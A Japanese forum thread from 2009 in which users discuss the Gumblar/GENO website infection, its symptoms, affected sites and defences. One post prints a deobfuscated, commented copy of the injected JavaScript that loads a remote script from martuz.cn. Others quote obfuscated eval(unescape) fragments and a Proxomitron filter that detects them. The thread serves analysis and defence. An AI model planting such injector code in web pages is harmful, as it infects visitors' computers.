ちょっとPS3買ってくるわ

>>547
ttp://ja.wikipedia.org/wiki/IP%E3%82%A2%E3%83%89%E3%83%AC%E3%82%B9

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://gumblar.cn/

＞不正なソフトウェアをホストしていたかどうか
＞はい、このサイトでは不正なソフトウェアのホスティングが過去 90 日の間に検知されています。sangsangmadang.com/, wz114.com/, futuraproject.cz/ を含む 10168 個のドメインを感染させています。


10168個のドメイン・・・だと？

>>613
ここの情報を基にしたり、ここで聞いたりするより、Adobeのサイト行って調べた方が確実だと思われ

>>600
埋め込まれるスクリプトも進化してるんだな。これだとFirefoxも危険だ。

>>622
つ ドリームキャスト

このスレ5人ぐらいで回してるの？

また中国か

>>600
今いちばん安全なのはChromeってことか。

>>501>>514>>518
Sleipnir → Firefox3 移行推進計画
ttp://ktrue.blog.shinobi.jp/Entry/387/

ここに書かれてるの片っ端から入れたら楽に乗り換えられた
今じゃアドオン探しに夢中だわ

>>628
ここには俺とお前しかしないよ

vistでsqlsodbc.chmファイルが3つ出てくるんだが・・
あと二つのサイズが50,004 バイト、48,663 バイト
オワタ・・？

>>630
一番安全なのはマックに決まってるだろ

>>619
え？
http://www.dotup.org/uploda/www.dotup.org34723.png

>>632
２人だけか

みんなスクリプトだよ

>>629
実際には中国じゃないよ

IE→危険
火狐→危険水域に達しつつある？

くらいのキモチでいればOK？

内部破壊するわけでもないし
FWで十分なのになんで騒いでるんだろ・・
ここのトピの人達って情弱？

>>633
Vistaならそれは普通

ウィルス作った奴誰だよ
俺の貴重なホリデイをブッ潰しやがって
許せねぇ

>>634
常々申し上げているとおり
Macが安全なのはｒｙ

>>635
知ってたか、それGoogleの機能なんだぜ

感染したらどうなんの？

オレはグーグル クロムで勝ち組だわｗ

Seamonkeyもやばいの？

>>644
うん知ってるよ
で？他のブラウザは？

>>639
特に区別無くどちらも対象にされてるからどっちが安全とか無いよ
今でこそ判定文付けてるけど、そのうち全ての環境で感染できるか試すようになるかもね

>>640
お前の自慢のFWで>>324を全部踏んできてもらおうか

>>649
ここ数日見てると何かそれくせえ。

JavaScript切ったら、Google先生の検索結果に出てた
安全サイト確認ロゴも消えてしまった

>>650
全部踏んできたお

バージョンに関してはまとめとかに書いといてもしょうがないんだよな。
いつ更新されるかわからないんだし。

ドメイン的に発信源は中国と思ってたんだけど
中国じゃないの？
ちなみにgumblar.cnはもう死んでるからいまさらこのドメインブロックしても意味ないんだよね

なんだなんだ
結局GoogleChromeが最強のブラウザ決定？

>>631
参考にしてみる
ありがとう

>>645
ほかの人うつす可能性があるだけで事実上無害
気にするだけ損なウィルス

>>641
おお、そうなのか。複数出てくるのは普通なのか。
サイズが違うのはやっぱりまずい？

>>656
Netscape

>>655
gumblar.cnの設置場所はロシアだけど、犯人(グループ)がどこにいるかは
わからんね。

Vista用のテンプレもなかったっけ？
どこいった？

>>650
同じくFWだけで踏んできたが何か？

>>655
別にドメインが中国でも実際に使ってるのは中国人じゃない可能性はあるだろ

>>658
豚インフルに似てるな

いつ攻撃法をJavaScriptからActiveXへ変えるのだろうか

サイト側が感染する時って
どういう仕組みで感染するんですか？

知ってる範囲で感染サイトまとめくれ
ν速じゃ４Gamerとか痛いニュースやYourFilehostが感染だの憶測が飛びまくってて分からん

いつになったらおさまるのだろうか
対策はしているがまた亜種が出てきたらどうしようかとか色々考えてしまう

>>667
スクリプト踏んで感染したPCからftpパスワードを抜かれる

最新の検体だとF-Secureひっかからないのか…
とりあえずSASに記録しとくか…

ノートンじゃ反応しないらしいからオンラインスキャンしたいんだけどどこ使えばいいのか

火スペ！

>>658
え・・・？

>>658
* コマンドプロンプトを実行中ではないのにcmd.exeが起動している
* cmdやregeditが起動しない（Explorerが落ちる）
* 特定のサイトに接続できなくなる
* ブラウジングがまともにできない
* Adobeが5分に1回のペースで更新を要求してくる
* CPUの稼働率が何も作業していないのに50％近くに上がる(CPUのコア数によって違う)

こんな症状が報告されてるがな

愚痴。
判りもしないで騒ぐなって馬鹿いるけど、だったらウイルスの挙動を完全に解析してくれ。
それができない・亜種が発生し続けてるから何されるか完全に把握できないってのに。

>>648
Chromeにはあるんじゃね？

>>972
カスペルスキー
http://www.kaspersky.co.jp/virusscanner
感染してたらこれが検出
http://dec.2chan.net:81/may/b/src/1242482913269.jpg

fc2ブログ見れなくなった…
俺だけでしょうか？

http://search.chiebukuro.yahoo.co.jp/search/search.php?flg=3&p=eval+unescape
HTMLにいつのまにか謎の文字列が挿入されています。 ...2fsc:72ipt:3e:22):3b:7d';
var Mdpko=FPCN.replace(Y3n5P,MRfH);eval(unescape(Mdpko))})(/:/g); --></script>
ヨミサーチを設置後、htmlソースがおかしくなりました。 スクリプト記述部が
<script language=javascript><!-- (function(t){eval(unescape


感染広がりまくりｗｗｗｗｗうぇｗｗｗｗｗｗｗ

var j = "", u = navigator.userAgent;

if(
　　　　　(u.indexOf("Chrome")<0) &&　 　 　　//Chrome以外ならtrue
　　　　　(u.indexOf("Win")>0) &&　　　　　　　 //Windowsならtrue
　　　　　(u.indexOf("NT 6")<0) &&　　　　　 　//WindowsNT6以外ならtrue(XPはNT5.1、VistaはNT6.0)
　　　　　(document.cookie.indexOf("miek=1")<0) &&
　　　　　(typeof(zrvzts)!=typeof("A"))
){
　　　　　zrvzts="A";
　　　　　if(window.ScriptEngine){ //IEのVBscriptが実行できるならtrue
　　　　　　　　　　j = ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();//VBScriptの命令の羅列（詳しくはググれ）
　　　　　}
　　　　　document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>"); //scriptタグ書き出し
}
更に読みやすくしてコメント付けてみた
IEでVBScript使えないと動かないっぽいね

一週間くらいでワクチン対応くるかな

>>672
オンラインスキャンでも最新亜種は検出しないよ。
検体を提出してもクリーン判定されちゃうもの。

>>672カスぺとかじゃない…
なんかもうどのソフトも後手後手だから、予防対策とっておとなしくしてるわ…
亜種出まくりだし。
なんか変な感じするなぁ。

恐らくワクチンが出来るまでに>>681はあぼーんする可能性99.8%

>>675
UPX解凍しても中身が全部見えない
u.batの挙動は海外サイトで纏められてるが、残念ながら不明

夜になって急に騒がしくなってきたな

>>664
中国人が発信源じゃなくて、中国が発信源と思ってたの

コキントーとかの私用パソコンが感染したらどうなるんだろか？

犯人が中国人だったら死刑だろーなｗ

そりゃまあ対策ソフトなんだし先手はありえんな

OperaでJS、Java、FlashとReaderのプラグインを切る、これ最強

>>675
亜種っていっても、FlashとPDFの脆弱性を利用しているという点ではずっと一貫してると思うんだが。
だから呼びかけられてる予防方法はずっと変わってないだろ。

つーかそこに挙がってる症状は、とりあえず感染の目安になるってだけじゃないのか。
問題はトロイを仕込まれるってとこなんじゃないか？

少なくともGENOで確認されて一月経過してて、他所ではもっと前から感染してるのに、
一向に対策が進まない現状

もうわけわからん

これ外国でも騒ぎになってるのか？

UACの偉大さ

>>675
とくに深刻な症状でもないね
気にするだけ無駄ってのが正解かも
キンタマで人生終わるとかじゃないからｗ

fc2はfc2ブログだけじゃなく、fc2.comも開けなくなってるな。
fc2.comの管理者が食らってメンテ中か？

>>680
違う。
IEの場合はj=以降にjscript.dllのバージョンが入ってmartuz.cnを呼び出す。
その他のブラウザはj=以降に何も入らずにmartuz.cnを呼び出す。
その違いだけ。

>>687
http://www.trendmicro.com/vinfo/images/DOWNAD_AD/AD_01.jpg
　ワームは、UTC （協定世界時）に基づき、250のランダムなWebサイトを含むURLのリストを毎日作成します。
例えば、算定された文字列が "abcdef" の場合、ワームは、この文字列の末尾に、".biz" や
".inf" や ".org" や ".net" や ".com" の文字列を追加します。これにより、
URLは、"abcdef.biz" や "abcdef.info" や "abcdef.org" や "abcdef.net" や "abcdef.com" となります。

>>635
IE8でも、検索サイトをGoogleに設定しているとそうなるらしいけど、
俺は怖くて試していない

>>678
同人板でも話題になってた
いつものことなのかそうでないのかの判断がつかない状況

なんか火消しに奔走する奴が出始めたな
どこかの関係者か？

ソースチェッカーオンラインが「アクセス規制中です　現在、大規模な攻撃を受けており」だってさ
同人板の連中が殺到してんだな・・・乙

そもそも犯人の目的は何なんだ？

>>704
おまいのアナル

GENOの人居るんでしょ？
ちゃんと責任取ってよね
キャッシュ消せば大丈夫とかよくも大嘘こいてくれたな

>>704
Vistaの普及

ブルスク気にしないのか

genoはどんどん名が売れていくな
よかったじゃんｗ

とにかくjs切ってサイト閲覧してれば大丈夫ってことだよね？

>>704
目的の一つはアフィ。
検索結果のリンク先を書き換えるらしい。

同人同人騒いでるのってあの人でしょ

結局vistaなら大丈夫なの？

>>707
俺すでにびすたんだよ

>>695
この間仕方なしにVistaに変えたけどそれオンにしていたら
どんな警告出るの？

>>710
今のところはね。
いつまでもjavascriptだけとは思えないけどね。
javascriptのバージョン判定部分なんかも書き方変わってきてるし。

>>696
ゾンビになって犯罪に加担することになります
ある日警察がきます

>>704
大規模なボットネットを手に入れるためじゃない
その手の世界では結構な高額で売れるんだとか

GENOウイルス自体は感染を広める為だけの物だから解釈によっては無害とか言うことも可能なんだろう
でもゾンビ化してるから後から遠隔操作で何されるかはわからん

>>706
　　　　　　　　　 ／） 　　　　　　　　　　　　　□
　　　　　　　　　　　／／／） 　　　　　□
　　　　　　　　　 ／,.=ﾞ''"／ 　　　　　　　　　　　□
　　　／　　　　 i f　,.r='"-‐'つ＿＿＿_　　　角砂糖3個やろう
　　/　　　　　 /　　　_,.-‐'~／⌒　　⌒＼
　　　　／　 　,i　　　,二ﾆ⊃（ ●）.　（●）＼
　　　/　 　　ﾉ　　　 ilﾞフ::::::⌒（__人__）⌒::::: ＼
　　　　　　,ｲ｢ﾄ､　　,!,!|　　　　　|r┬-|　　　　　|
　　　　　/　iﾄヾヽ_/ｨ"＼ 　　 　 `ー'´ 　 　 ／

>>711
もしそうなら(相手が大規模な詐欺グループでないなら)簡単に身元割れるんじゃね？

chromeも>>635みたいに弾いてくれるのか？

chromeはjs不許可にできないから試せない・・

>>713
UAC切ってるならＸＰ同様感染する

とうぶんフラッシュは見ないことにしようと思ったんだが、
よく考えるとおとついadobeのフラッシュプレーヤー更新したとき以外
ここんとこ全然見る機会なかったわ。

捨ててもいい気がしてきたw

いやもうGENO潰れろよ
恨みを一身に背負ってさ

>>704
botnetのゾンビ集め

で、そのnetを時間貸しでレンタルして金稼ぎ、らしい

47 名前：GENO[] 投稿日：2009/05/16(土) 23:53:41 ID:yglYJEG80
4gamerとファミ通が感染したぞーパンデミックじゃ（＾o＾）ノ

ノートン先生まだ寝てるんだぜ？

感染サイトまとめとかないの？

UACって何

>>689
○○最強！なーんて言ってる場合じゃないなって…
>>691
進まないな…不便になるのが嫌なのは分かるけどさ…
仕事で諸々をアップデート出来ないって人は大変だ。

>>726
それ確定情報ねーだろ

>>691
そうだよ、だから

簡潔に>>530だけを>>1に書いとけばいいだけ

馬鹿がテンプ色々付加するから混乱するんだよな

理解しきれてないから長文でしか説明できない馬鹿がスレタテるとこうなる。

ちなみに>>530はおれが書いた

故意にデマを広めると検挙されるケースもあるから注意な

Scriptからの挙動による対策
・ Google Chromeを使う
・ Windows以外のOSを使う
・ Windows Vista以降のOSを使う
・ cookieをオフにする
・ JavaScriptをオフにする
・ Adobe Readerを使わない

これのどれかを行えば今のところ感染しない

>>722
少なくとも現時点で明らかになっているスクリプトではVistaとChromeは
除外してるよ。

>>723
動画サイトいかないならおｋじゃね

>>716
サンクス。
Geno騒動初期に手に入れたオミトロンのフィルタが
機能するかどうか試したんだけど、アラートはでなかった。
JsOffでも機能するよね？

[Patterns]
Name = "GENO Virus Killer"
Active = TRUE
Limit = 512
Match = "<!-- (document.write\(unescape\([^\n]+)\0 -->"
Replace = "<!-- !!! GENO Virus !!! -->$ALERT( !!! GENO Virus !!!\n\0 )"

中華のサイバーテロ演習

>>732
ゆとり乙
火消しのつもりか？

とにかく家族や他人様に迷惑かけないように
ネットを切って働いて自立するべきだな

>>740
夜勤は来週からだ

>>728
ネットしなけりゃOK

あと、プニルで見たんだが、ちゃんとGoogleからの警告があったよ。
IE8でも警告されると思うが、念のためjs切ってみたほうがいい。

Vista使ってて初めて良かったと思った

GENOの対応はたしかに酷いが、ここまで広がってるのはもうGENO関係ないと思うぞ。
どっちかっていうとアップデートしてない人がこんなにいるのかって驚き。

>>737
document.writeの直後、unescapeのパターン以外にもいくつかあるよ。

amazonが感染したとかどっかで見たけど流石にデマだよなー

>>740
お願いだからお仕事休んでね！って会社が言うんだよお

>>734
Cookieは関係ないです、勘違いだった。

>>745
関係なくはない
小林みたいにしっかりと「ウィルスでしたごめんなさい」とすぐに書けば
感染した奴もすぐ対応できた

>>739

なんのための火消し？

中傷は反論じゃないですよ。

具体的にどうぞ。

>>743
ドメイン変わってスルーされてるって話だけど、どうかな

47 名前：GENO[] 投稿日：2009/05/16(土) 23:53:41 ID:yglYJEG80
4gamerとファミ通が感染したぞーパンデミックじゃ（＾o＾）ノ


これって本当？

こんなの全然問題じゃねえだろ！って情弱が逆切れし始めてんな。
PCにどれだけ飼ってるのか興味深い

http://www.kingsoft.jp/
ここも感染した？

>>743
googleから検索して開けばブロックされるに決まってるだろアホか
問題なのは普段見ているサイトが感染したとしてブックマークとかから直接アクセスした場合
firefoxはgoogleのDBから随時リストを更新している
chromeはどうなんだ

>>755
お前もういい加減にしろ

>>752
Googleが危険判定したら別ドメインに逃げてるっぽいよな。

いつも見ているサイトももしかしたら感染するかもしれないし
気をつけないといけんね

>>751
この改行どっかで見たな
ν速か

Nortonはなんで一向に対応しようとしないの？

>>753
見てみた。感染してない

感染報告無いのに○○が感染してるって本当？という質問ずっと続ける奴はアレだな・・・

先生は忙しいんだよ

>>745
へー
で
なんでキャッシュ消せば大丈夫とか書いちゃったの？

レジストリエディタの編集をしようとすると落ちる症状
（立ち上がるがkeyの変更をしようとすると落ちてた）が連発してたが、
まさかこれの亜種だったのだろうか。

NET.FRAMEワークのパッチあてて直ったんだよな。

>>761
国内担当が土日でお休みだからじゃね

>>761
たぶんエンジンに手を入れない限りシグネチャで対応しきれないから。

GENO社員が火消しに降臨したか

・感染したらクリーンインスール
・予防はFlashとReaderを最新版に。


２行で済む話をなんで永遠８スレ消費してやってんの？？


　

GENOは関係あるよ
そのままキャッシュ消して普通にネットしてる人だっていただろうしさ

>>746
それじゃあアラートでないはずだ。

>>761
センセイは職場放棄しましたＯＴＬ

>>745

先生ならさっきもう食べられないよーとか寝言言ってたぜ
早く起きていっぱい食えよコノヤロウ

GENOのせいだろどう見ても。ショップ閉鎖するべき。
パソコン直す店やったとしてもパソコンにコード仕込まれたら意味ないしなｗ

バスターも土日休みだっけ

>>761
先生は今敵に昏睡状態にされてるんだよきっと

>>770
・感染サイトが増え続ける一方だから
・亜種が出てきたから
・GENOが火消ししようとするから

>>729

ユーザーアクセスコントロールだ。

reader更新しときゃいいんだよ

次スレいらないね

>>770
その２行がいつ無効になるか解らないからみんな常駐してるんだろ
インフルエンザと同じだ

>>761
先生なら今俺の隣で寝てるぜ

つか、Flash関係ないし・・

おいｗｗｗ新型インフルと、GENOスレを同時に見てるとこの先地獄しか想像できないんだがｗｗｗ

時限式とかないよね？ね？

VMwareでリボンマジックとwww■senlights■co■jp/seihin/kirenaru-1s■htmを踏んでみた
リボンマジックの方はなんともなかったが、後者のサイトはPDFリーダーの起動とウイルスサイトへのアクセスを確認した。

>>770
馬鹿だろお前

>>761
バスケがしたいですぅ・・・・

>>782
感染したら〜はハードウェア破壊されない限りどのウィルスでも有効だと思う
そもそも対処法じゃないけど

>>786
ありますん

>>785
外に出ても感染
家の中でも感染

なんか「I LOVE YOU」メール依頼の大流行になりそうな悪寒

google preview入れてるとサムネで教えてくれるんだな
びびったわ

わしが育てた

>>761
先生を解放してあげようよ

>>782
経過観察って重要なんだな…

>>786
時限式と言うか、遠隔操作してるとこからいつでも弄れるからな。
いつ「始める」かは犯人次第なわけだ。

意味わかるよな？

GENO関係者が必死に火消しするのはなぜ？

二次元に逃げるしかないな

男に逃げるしかないな

>>793
2ちゃんに書き込むとノートン先生が飛び起きる魔法のコードですね

>>800
それだ！

>>753
今見てきたけど、それらしい痕跡は無かったけどな。

ドリクラの宣伝禁止

>>788

馬鹿の理由を

みんなに伝わるようによろしく。

おまえよりはましだと思うけど。

F-Secure Security Labs から
Thanks, we're publishing detection shortly.
って回答

宣伝効果絶大だわ
ちっとまえまでＧＥＮＯなんて知らなかったよ

ワトソン博士を忘れちゃいないか？

GENOの社員なんかじゃないよ、実際GENOの対応は酷いって書いただろ。
だけどGENOは責任なんかとっちゃくれないし、クリーンインストールしたりして損すんのは自分じゃんか。
ふだんから気をつけておくのにこしたことはないのにねって話したかっただけだよ。すまんね。

>>810
「関係ない」って書いたからあれだったんだろうね。

ノートン先生まだ刺身食ってる途中なんだぜ？

セキュ板のGENOスレが立った時に、ここ数年でも最凶レベルにやばいって書いたけど本当にやばそうだな

>>806
ageで無駄に行間空ける自己主張むき出しのレス馬鹿すぎる

>>799
責任逃れだろう

>>770
×永遠
○延々

・感染した場合、少なくとも感染時に通信したFTPのPassを変更する必要がある
・ウィルスがFTP以外の通信ログを取っているかどうか不明

おいかまうなよ

fc2.com復帰した。ただのメンテだったのか？

>>810
あほの相手して損すんのは自分じゃんか。

ウィルスばっかで嫌じゃぁああああああああああああああああああああ


でもちょっと・・・

ブラスターのときもそうだったけど
ひとたび広がりだすと、亜種が出まくるので
現在OKであっても明日にどうなっているかわからん。

adobeを最新にしていれば大丈夫とあるが本当にそうと言い切れるか？
亜種があっさり突破できるレベルの改善なら一時凌ぎにしかならん。
それともadobeの今回の更新で根本的対処ができたという
確実な情報でも持っているのか？

windows updateが出来ないのはなんでだ？　WMP11 IE8とかインストールできない

>>820
台風きたときのわくわく感とか感じたくてここに張り付いてる奴絶対いるなｗ

>>538
その前にPG2の使い方レクチャーしてくれ
誘導されたとこにいったら怒られた

どっかのアンチウイルスソフト業者がワクチンを無償配布しないものか…

とりあえず
Adobe　Reader　9.1.1
Adobe Flash Player 10
が最新でOK？

>>822
割れ厨はダウソへどうぞ

>>823
地震板に加えてウイルス板が

>>823
ドキッ！

www■ribbonmagic■com/
確認。gumblar.cnへ飛ばすコードが2つ挿入されている。
>>324に追加

>>826
カンブリア紀もんじゃね？

>>821
なんか勘違いしてないか？　現状で最新版のFlash PlayerとかAdobe Readerで問題が出たって話はないだろ。
亜種が問題になってるのは>>1にあるような「わかりやすい症状」がどんどん変更されてるからじゃないのか？

>>822
感染しちゃってるからじゃね？

とにかくGENOは何らかの償いをするべきだ

・sqlsodbc.chmは正常値（XP)
・数日前に突然explorer.exeが落ちた
・ウイルスバスターでスキャンしたら異常なし
・cmdとregeditは起動できる

これはどう判断すればいいんだ

>>823
わくわく通り越してぐったりだよ・・・

お前ら実はこの状況を楽しんでるだろ？

ノートン新しい定義ファイル来たけどどうだろ？

>>821
絶対大丈夫なんて誰も保証できない。

今回だけじゃなくネットで遊んでれば何時だって危険に晒されてるのが
現状じゃ有るまいか？
今回はadobeを最新にするのがベストって事でそんなに木馬やウイルスが
怖いなら携帯でするしかないぜ。

>>835
サイトとかもってないんか

>>835
エクスプローラが落ちるのはWindowsなら良くある話

>>782

それ極論ね

少なくとも今回のはそれで防げるんだから

それ以上の対策はないし

未来のウィルス防げるなウィルスなんて存在してないって。

>>837
…まあ

>>824
ttp://pc11.2ch.net/test/read.cgi/sec/1228949365/

>>842

もういいって。

寝なよ。疲れたろ。

>>835
台湾バスターは対応してませんが？

>>823
俺なんて目まいがして吐き気が出てる

>>840
昔（何年も前）持ってたけど今はない、でもffftpは入ったまま

>>721
"…\chrome.exe" --disable-javascript --disable-java --disable-plagin --user-agent="Mozilla/5.0 (Windows; U; Windows NT 6.0)"

>>821
もっともだと思うが、Adobeの脆弱性以外の経路まで疑いに入れると、それはもはや
任意の新規ウイルスに対する心構えをどうにかするってレベルと同じ話になってしまうと思われ。

そうなった場合、もはやこのスレに張り付く以外にも新規の脆弱性関連の速報の収集とか、
未知のゼロデイアタックに対する一般的な対処法の検討とか、いろいろやらなければならない事が多すぎる。

>>847
きみは豚の方だ

なんだこの改行厨
そんなに自分のレス目立たせたいのか
自己顕示欲の塊みたいなやつだなｗ
それとも火消しに必死などっかの社員か？

>>477
改行豚は死んでこいや

先生には優しいスレだな
今まで頼り切ってたからこれからもがんばってもらわないと困る

GENOにとってはかえって宣伝になってんじゃねえか。
だって名前さえ知らなかった奴のほうが多いだろ？
いいか悪いかはともかく名前はずいぶん売れてるじゃんか。ほぼ2ch限定で。

>>835
explorerはウイルスじゃなくても割と落ちる

このウィルスを知らない人がどんどん感染していく始末

もうgenoウィルスで定着しただろ

バスターがGENOウイルスって命名してなかったか？

じぇの？

　　　　　　　　　　　　　　　　　/ﾟ 　 　 ｡
　　　　　　　　 　 　 　 ﾟヽ　　 {＿__／　,．-‐ ｡
　　　　　　　 　 　 　 　 　 )'´　 豚　｀ヽ.　大阪人アホやから
　　　　　　　　　　 　｡＿_,′・ 　　　 ・ 　─- ｡とりつきやすかったわ
　　　　　　　　　　　　 　 {　┌‐──┐ j、
　　　　　　　　　　　　 　 .ゝ、￣￣￣_,ノ　ヽ。
　　　　　　　　　 　 　 ﾟ´　 　 厂￣ ｝
ぱんでみっく　 　 　 　 　 　 ﾟ　　　ﾟ　　　　大阪人由来で
　したろかー /ﾟ 　 　 ｡　　　　　　　 　 　 　 /ﾟ 　 　 ｡　大阪弁になってしもたわ
　　 　 ﾟヽ　　 {＿__／　,．-‐ ｡　　 　 ﾟヽ　　 {＿__／　,．-‐ ｡
　 　 　 　 )'´　 豚　｀ヽ.　　　 　 　 　 　 )'´　 豚　｀ヽ.　　　 あほインフルエンザて呼んでや
　 　｡＿_,′・ 　　　 ・ 　─- ｡　 　｡＿_,′・ 　　　 ・ 　─- ｡
　　　 　 {　┌‐──┐ j、　　 　　　 　 {　┌‐──┐ j、
　　　 　 .ゝ、￣￣￣_,ノ　ヽ。 　　　 　 .ゝ、￣￣￣_,ノ　ヽ。
　　　 ﾟ´　 　 厂￣ ｝　　　　　 　　　 ﾟ´　 　 厂￣ ｝
　 　 　 　 　 ﾟ　　　ﾟ　　　　　　　 　 　 　 　 ﾟ　　　ﾟ

>>848
まあexplorer落ちることよくあるんで大丈夫じゃないかね
感染サイト見たわけでもなさそうだしね

>>824
ほらよ、PG2の使い方紹介サイト

ttp://ff11.my-sv.net/pg2/install.html
ttp://lineage.paix.jp/guide/security/basic-ipfilter.html
ttp://forum.gemini777.net/tutorials/pg_jp.php
ttp://www.nicovideo.jp/watch/nm2825098

さて、下火になったことだし寝るかな

バスターなんか役に立つと思ってる奴マジで言ってんのかお？大爆笑

>>832
「これとこれさえ対策すれば全部OK！」なんて油断している奴を狙うのが今時のウイルスなんだがね。
ましてやここはセキュリティ板。未知の攻撃に警戒して何が悪い？

大丈夫だろって言っている奴は
こんなスレなんて無視すりゃいいだけだな

GENON　ENESIS

俺の火狐もよく落ちる
でも感染して無いし怪しいとこ踏んでない

感染報告ありの個人サイト持ちの対処として、(Winでxp、詳しい知識ない)

pcの感染はないか確認
flashとかアップロード
IEはjs無効にする
サイトのhtml記述を確認
FFFTPはソフトごと削除

これでもう一度感染チェックして暫くpcごと開かなかったら、(ネットワーク遮断で利用する)
自衛とゾンビサイト化は防げるでFAと思っていい？
勿論、毎日このスレはROMする

UACはユーザーアカウントコントロールな……

このウイルスってパソコンだけ？
ケータイも関係あるのかな

>>821

旧FlashやReaderの脆弱性を突いただけで

対策されたバージョンの穴を見つけることなんておいそれと出来ないよ

まぁプログラムとか自分で組めない人はこんなもんか。

バスター厨は、どこの板から来たの？

感染してるか気になる奴ってなんでウィルスチェックしないんだろう

リボンマジックは既にGoogle先生によって攻撃サイトとして登録済み
また、ribbonmagicはgumblar.cnに飛ばすコードであり、現在のところgumblar.cnは応答しない
ただしいつmartuz.cnに飛ばすコードに書き換えられるかわからないので注意

>>862
今のところは感染してないってことでいいのかな。サンクス

サイト管理者向けですが。

Troj/PHPMod-A: Behind the Troj/JSRedir-R attacks. (Sophos)
ttp://www.sophos.com/blogs/sophoslabs/v/post/4422
HTMLだけじゃなくPHPもやられるので、借り物のPHPスクリプト
(XOOPSとかMediaWikiとかPukiWikiとかphpBBとかvBulletinとかWordPressとか)を
中身も見ず・よくわからずに使ってる人は自分のサイトをちゃんと確認してね!

Yahoo!のトップにニュース出してくれよー

IEのjs無効ってどうやるの？

>>879
それくらいしてくれればいいんだけどね。
今は豚インフルでてんやわんやだから･･･

いや別にITニュースの枠は別にひとつくらい空けられるし
ITmediaなりImpressなりが配信すれば一発だろ

>>880
ネットしなければ良いんだよ

そろそろ大阪は日本から独立すべきだな

一般人はPCのウィルスより豚のほうが大事なんだろうな

www■senlights■co■jp/seihin/kirenaru-1s■htm
このサイト感染するみたいだし、誰かVmwareで動作試験しといてよ
PDFやフラッシュでのバージョンごとの感染の確認や、sqlsodbc.chm改変の有無
感染後にカスぺで本当に検出できるかどうか

>>880
セキュリティのカスタマイズ
ついでにActiveXも切っておけ

Java関係とActiveXを切って安心と思ったけど、
画像見ただけで感染するタイプのウイルスあったよね？

だからぁｗ
おまえら踊らされすぎ
Adobe関連を最新版にしとけば
普段の生活でいんだって。
煽り厨うざいわ

サイズもハッシュも違ったから感染してるんだろうけど
その他の症状が出ないんだよなあ
再起動怖くてできない

sage方も知らんやつが
なんか偉そうなこと言うてるで＾＾；

>>886
言い出しっぺの法則

>>885
職場以外でPC触らない人ならそんなもんだろ

・自転車の前カゴに財布
・磁気キャッシュカード
・パスワードは生年月日
・暗号化なしで無線LAN

平和な日本！　PCにマルウェア仕込まれるくらい何でもないぜ！

>>886
用意できたらいくわ

>>870
別にFTP接続ソフトを削除する必要は無いよ。
起動して接続しなければいい。

　　　　　　　　　　　　　 _,.　-―――-　､
　　　　　　　　　　　 ／: : ‐: : : : : : :‐- ､: :＼
　 　 　 　 　　　　／: : /: : : : : : :＼: : : : ＼: :＼
　　　　　　　　　/: :/: :.|: : : : : ! : : : ＼: : : :.ヽ: : ヽ
　　　　　　　　 /: /: : 八: :!: : :|＼: : : : ヽ: : : :',: : :.',
　　　　　　　　,': /ニ7⌒!:.!: : :| ⌒ : : : : : : : : |: : : :!
　 　 　 　 　 /: :.|: :./　　V＼: !　　 ヽ: :!: :.|＼|: : : :.＼__,
　　　　　　 /: : :ﾊ: :|　　　　　ヾ　　　∨!∨: : : : : : : : :ヽ
　 　 　 　 /: : : : :.V:! x=ﾐ　　　　x＝ﾐ.　!: : : : ﾊ: : : : : :.ﾊ
　　　　　/:/: : : : /: :! ､､　 ､ 　 　 　 ､､ !: : !: : :!: : : : : : :.}
　　　　 // |: : : /| :八　　　　- ､　　　 ,ｨ: :/: : /: :ﾊ: : :|Ｖ
　　　　 {!　从: ｉ'´￣::::＞､　`ｰ '　　イ!V /: : /: /　|: :/
　_人_　　　 /Ｎ::::＿:::::/::| ` r　'　／/:／: ／‐く　　Ｖ　　　　　Kaspersky♪　Kaspersky♪
　｀Y´ 　　 /:::::::/／:::/:::::|　　><　 /:::丁´:::::::::::::Ｖﾟ}∩　　＊
　 　 　 　/::::ｎんh_::∧:::::}／八. ∨::::::｣::::::::::〈ヽ.ﾉ///〉
.　　　　 /:／| ! // 〉:::::>ﾍ.ノ八 ソ::::{::::::::::::/:::}　　　　っ
　　　　//:::::::＼__ノ〉::〈:::::::|/　∧〉::::〉::::::::/::::∧　 , ィ´
　　　 /:::::::::::::::::::::/::::::::＼::!　/:::::>'´::::::::/::::/:::い.ノ):〉
　　　 !:::::::::::::::::::/:::::::::::::::::ヾ厶イ:::::::::::::/:::/:::::::ヽノ:/
　　　 |::::::::::::::／ヽ:::::::::::::::<>:::::::::::::::::::/ |:::::::::::::::::::/　　*
　　　　`ｰ七:::::::::::::::::::::::::::::::::::::::::::::::::/　|:::::::::::::::::/
　　　　 ／/:::::::::::::::::::::::<>::::::::::／::::/　　ヽ:::::::::::/
　　 ／⌒〈:::::::::::::::::::::::::::::::::::イ::::::::/　　　　`ｰ‐'　　＊

vistaでの感染は０ですか？

>>888
そうやって安心したいのはわかる
とりあえずもう一度完全スキャンやり直せ
引っかかったらPC叩き壊せ

質問してくるやつは、まずスキャンしろよ

>>896
ゆいぃいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいい

>>892
職場のPCでネットサーフィンしまくってる奴いるんだが大丈夫だろうか

>>894
頼んだ。
sqlsodbc.chm改変の有無、感染後にカスぺで本当に検出できるかどうか
上記2つが事実でなかったらテンプレの対策意味なくなるしな

>>896
そんなのに萌えてる余裕は無い
感染してたらもうダメなんだろうな…

Youtubeとか動画サイトがやられると困るので、
中の人はセキュリティの見直しお願いします

>>897
UAC機能無効にしてたらアウト

JaneStyleの作者がUAC無効にしろとか狂ったこと言い放ってたから
（銭ブラがVistaに対応してないという指摘への暫定対処らしいが未だに暫定のまま）
鵜呑みにして設定変えちゃってる奴も少なくないだろう

>>873
ただ怖いのは、FlashやAdobe Readerの脆弱性狙いの効果が薄れたら
動作を止めておとなしくしているかもしれないってこと。
で、新たな脆弱性が見つかったら活動再開。

>>893
今どきそんなATMスペックで街中闊歩してるのは情弱のバカくらいしかいないだろ






うわああああああバカだらけだ日本ｗｗｗ

雨降ってきたな

>>901
この実話教えてやれよ
50 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 00:33:18.70 ID:8fz7e8f5
リアルにPCやられた。IEが強制終了される。しばらくZIPはふむな。
162 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 01:05:12.95 ID:8fz7e8f5
ああ本当に壊れた
再インストールすらさせてもらえない
何かしようとしても強制終了される。
